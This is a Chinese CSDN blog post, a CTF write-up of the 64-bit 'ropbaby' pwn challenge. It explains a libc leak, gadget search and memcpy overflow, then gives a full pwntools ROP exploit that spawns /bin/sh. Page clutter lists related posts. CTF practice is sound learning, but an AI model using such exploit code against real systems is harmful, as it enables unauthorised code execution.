暑假训练pwn(3) 不能被落下太远额

最新推荐文章于 2023-01-20 00:00:00 发布
最新推荐文章于 2023-01-20 00:00:00 发布
阅读量181 收藏
点赞数
分类专栏: 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/97817183
版权

实验吧的ropbaby
今天是一道ROP(64位)的我本地打不通nc连不上我服了
但这道题还是可以的我们
这个文件的main函数可以直接告诉我么system函数的地址然后我们就可以根据它给我们的libc文件得到偏移然后算出基地址,最后算出’/bin/sh’的地址然后ROP链起来用ROPgadget --binary libc-2.23.so --only ‘pop|ret’
得到pop rdi; ret
我们就可以链上了理论上就可以getshell
最后就是找溢出点这道题的溢出点是 memcpy(&savedregs, nptr, v6)
savedregs是长度为8字节但nptr有1024个字节所以溢出了…
这是我的exp

from pwn import *
p=process('./ropbaby')
libc=ELF('./libc-2.23.so')
bin_sh=0x18cd17
system_offset=0x45390
p.recvuntil('4) Exit')
p.recvuntil(': ')
p.sendline('2')
p.recvuntil('Enter symbol: ')
p.sendline('system')
p.recvuntil('Symbol system: ')
system_addr=int(p.recv(18),16)
print system_addr
libcbase=system_addr-system_offset
bin_sh_addr=libcbase+bin_sh
gadget_addr=libcbase+0x021102
payload='a'*8+p64(gadget_addr)+p64(bin_sh_addr)+p64(system_addr)
p.recvuntil(': ')
p.sendline('3')
p.recvuntil('Enter bytes to send (max 1024): ')
p.sendline('64')
p.sendline(payload)
p.interactive()

逻辑上这个不会打不通阿无语了pwn太难啊带带我

doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
180822 逆向-网鼎杯(2-1)
whklhhhh的博客
08-22 2211
Reverse martricks main函数中接收输入以后将input和一个字符串异或一下存入savedregs中 这里7*(i_23/7)+i_23%7这种写法实际上还是i_23,只不过表示成了第x行y列的形式(7个元素/行) 两个数组分别存放在了savedregs-192和savedregs-128中 下面两层嵌套循环,中间进行了一个累加的运算 关键是箭头所指向的积的累...
萌新详细调试[V&N2020 公开赛]simpleHeap,带你走进堆利用
qq_36495104的博客
05-20 789
查看保护 无法修改got IDA查看 main void __fastcall main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi __int64 savedregs; // [rsp+10h] [rbp+0h] init_mem(); puts("Welcome to V&N challange!"); v3 = "This's a simple heap for you."; puts("Th
[Hgame]math
weixin_73384894的博客
01-20 237
五元一次方程
incaseformat病毒分析
whatiwhere的博客
01-14 5667
愚人节病毒 ??? 不同于熊猫烧香 彩虹猫 之前的钉_钉病毒, 2021年1月13号 incaseformat蠕虫病毒来袭,会自动复制到windows目录下,并写入注册表,重启电脑后,病毒会遍历除了系统盘外的所有磁盘进行删除。 病毒检出率 病毒行为分析 PEID分析 使用Borland Delphi 6.0 - 7.0 [Overlay]编写 先查看字符串信息 进行定位 危险函数相关代码 int TForm1_FormCreate() { __writefsdword(0, (unsigned
简单逆向22
m0_49936845的博客
08-02 182
诺莫22
PWN不欢沙龙演讲PPT.rar
05-20
3. **整数溢出**:在处理整数运算时,如果结果超出了数据类型能表示的最大值,可能会导致错误的计算结果,这在某些情况下可以被攻击者利用。 4. **栈保护与地址空间布局随机化(ASLR)**:为了防止缓冲区溢出攻击,...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
TIM3_PWN呼吸灯.zip
10-12
本项目“TIM3_PWN呼吸灯.zip”聚焦于使用STM32的通用定时器TIM3来实现一个常见的LED呼吸灯效果,该效果通过PWM(脉宽调制)技术来实现。PWM是一种在数字系统中模拟模拟信号的技术,它通过改变信号的占空比(高电平...
browser_pwn:浏览器pwn,现在主要工作
03-22
在V8_pwn中,d8经常被用来复现和调试可能导致安全漏洞的JavaScript脚本。 browser-pwn: 浏览器Pwn涵盖了所有针对浏览器的攻击技术,包括但不限于V8_pwn和JSC_pwn。这涉及到对浏览器组件(如渲染引擎、插件、...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
OtterCTF - Reverse - Msg Me This
weixin_30455365的博客
12-28 281
原文地址:Msg Me This 题目 Category: Reverse Engineering Points: 500 Solves: 15 Description: Rick created another vicious program Could you get the correct flag? 为了方便下载,我把exe文件后缀改成了jpg,下载下来改回去即可。 二进制文件: 解题过程...
D^3CTF2022 Re复现
Pvr1sC的博客
03-13 1521
经提醒想起有这么个东西,当时在忙着别的事。。。复现真是大开眼界,最大的收获就是知道了好多新名词,暂时告一段落了
bugkuCTF平台逆向题第五道love题解
iqiqiya的博客
12-28 8374
题目链接: http://123.206.31.85/files/99278e700add95793a765b13ab1314ea/reverse_3.exe tips: 查壳无壳(截图略) 载入OD 搜索字符串 随意输入1111111111111111111 发现进行了base64加密 再向下单步 发现、 结合IDA看下 int su
2018网鼎杯re-advance复现笔记
沐沐的博客
08-23 1305
  拿到程序运行一下,可以看到输出一个16进制的串,我们感觉这应该是一个字符串加密后的结果,尝试把这个16进制的串转换成字符串,这里看到writeup中有用python的libnum库,可以很方便的实现这个操作。 这是libnum库的安装和使用方法:https://www.cnblogs.com/pcat/p/7225782.html >>> libnum.n2s(0x4b...
CTF 【每日一题20160626】简单的PE文件逆向
hhhparty的博客
06-27 9793
简单的PE文件逆向 来源:http://ctf.idf.cn/index.php?g=game&m=article&a=index&id=38 题目:就在这里,很简单的~虽然我不会。。= =! http://pan.baidu.com/s/1dDzUL0X分析: 0.不明白PE为何物的,请参考文章: 初步认识PE: http://www.52pojie.cn/thread-15354
Bugku love
飞花的世界
02-03 889
https://ctf.bugku.com/challenges#love 首先是下载文件 程序的流程大体就是输入,然后比较。 所以首先用IDA打开程序, 使用 shift +F12  查看 有哪些字符串 看到有一个 enter the flag 那就是程序的入口吧,所以双击这个 字符串,然后 使用X , 查看地址   使用F5进行反编译   int sub...
破解之算法解析
九层台
10-12 646
这题是找程序获取到key时运行后输出的结果,很显然2种解法。 解法1:找出正确注册码的算法。 解法2:找出输入正确注册码后输出flag的算法。 这里是后者容易一些。.text:0045C458 00000005 C pass .rdata:00508E60 00000
160个CrackMe之001Acid burn破解思路
iqiqiya的博客
04-02 1217
 0x01:    查壳无壳0x02:    运行程序进行观察 发现有两个部分 我们先对Serial进行分析 0x03:          可以看到提示的错误信息为Failed!以及Try Again!!于是看可以直接载入OD进行动态调试右键反汇编窗口黑色空白部分 选择中文搜索引擎à智能搜索à接着右键findà输入Tryà可以发现离Failed比较近的是就是我们要找的  双击进入定位到关键代码 接...
2019看雪CTF晋级赛Q1——apwn
04-18 337
保护全开  #数组越界 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 __int64 savedregs; // [rsp+10h] [rbp+0h] 4 5 puts("This is a little game\n"); 6 ...
python3下载pwn
最新发布
12-27
在Python 3中下载pwn模块,你可以使用pip3来安装。以下是安装pwn模块的步骤: 1. 打开终端。 2. 运行以下命令来安装pwn模块: ```shell pip3 install pwntools ``` 这将会自动下载并安装pwn模块。 安装完成后...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值